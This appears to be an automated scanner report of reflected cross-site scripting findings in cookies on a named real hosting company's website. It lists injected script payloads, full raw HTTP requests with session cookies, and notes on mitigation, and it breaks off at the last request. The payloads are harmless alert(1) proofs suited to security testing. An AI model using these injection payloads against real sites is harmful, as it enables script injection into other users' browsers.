Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836f78"><script>alert(1)</script>2d685035c6a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abe90</script><script>alert(1)</script>2c13c6486d4 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8abe90</script><script>alert(1)</script>2c13c6486d4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cbce</script><script>alert(1)</script>e9d2b942ac3 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1cbce</script><script>alert(1)</script>e9d2b942ac3; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d431d"><script>alert(1)</script>34a5e4599f8 was submitted in the chatslider cookie. This input was echoed as d431d\"><script>alert(1)</script>34a5e4599f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd431d"><script>alert(1)</script>34a5e4599f8; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7985e"><script>alert(1)</script>be554f9bae3 was submitted in the IS_UASrackuid cookie. This input was echoed as 7985e\"><script>alert(1)</script>be554f9bae3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87985e"><script>alert(1)</script>be554f9bae3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a861</script><script>alert(1)</script>f745b7012c9 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84a861</script><script>alert(1)</script>f745b7012c9; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac83"><script>alert(1)</script>febc32dcd56 was submitted in the chatslider cookie. This input was echoed as 6ac83\"><script>alert(1)</script>febc32dcd56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D6ac83"><script>alert(1)</script>febc32dcd56; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba33c</script><script>alert(1)</script>ecc30a57054 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dba33c</script><script>alert(1)</script>ecc30a57054; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2d3b"%3balert(1)//79c0fed0c4 was submitted in the IS_UASrackuid cookie. This input was echoed as a2d3b";alert(1)//79c0fed0c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a2d3b"%3balert(1)//79c0fed0c4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3158"><script>alert(1)</script>e5aacc4613 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c3158"><script>alert(1)</script>e5aacc4613; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216a3"><script>alert(1)</script>f17fdb67e52 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D216a3"><script>alert(1)</script>f17fdb67e52; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ca95"%3balert(1)//1125833d53f was submitted in the chatslider cookie. This input was echoed as 4ca95";alert(1)//1125833d53f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4ca95"%3balert(1)//1125833d53f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97bda"%3balert(1)//7c3def72b14 was submitted in the IS_UASrackuid cookie. This input was echoed as 97bda";alert(1)//7c3def72b14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/configurations.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f897bda"%3balert(1)//7c3def72b14; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed21"><script>alert(1)</script>8032cd80c6d was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/configurations.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
